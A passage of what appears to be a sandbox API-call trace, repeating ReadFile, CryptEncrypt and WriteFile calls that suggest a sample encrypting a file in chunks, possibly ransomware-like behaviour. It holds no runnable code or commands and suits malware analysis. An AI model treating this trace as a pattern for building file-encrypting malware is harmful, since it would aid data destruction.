lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.903] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.903] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.903] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.903] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.903] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.903] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.903] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.903] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.903] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.903] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.903] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.903] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.903] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.903] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.903] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.903] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.903] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.903] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.904] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.904] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.904] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.904] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.904] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.904] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.904] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.904] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.904] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.904] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.904] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.904] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.904] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.904] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.904] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.904] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.904] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.904] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.904] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.904] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.905] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.905] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.905] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.905] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.905] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.905] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.905] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.905] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.905] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.905] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.905] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.905] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.905] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.905] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.905] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.905] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.905] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.905] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.905] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.906] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.906] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.906] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.906] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.906] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.906] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.906] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.906] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.906] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.906] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.906] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.906] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.906] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.906] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.906] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.906] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.906] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.906] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.906] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.906] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.907] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.907] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.907] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.907] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.907] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.907] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.907] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.907] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.907] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.907] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.907] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.907] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.907] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.907] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.907] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.907] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.907] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.907] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.907] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.908] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.908] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.908] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.908] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.908] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.908] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.908] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.908] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.908] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, 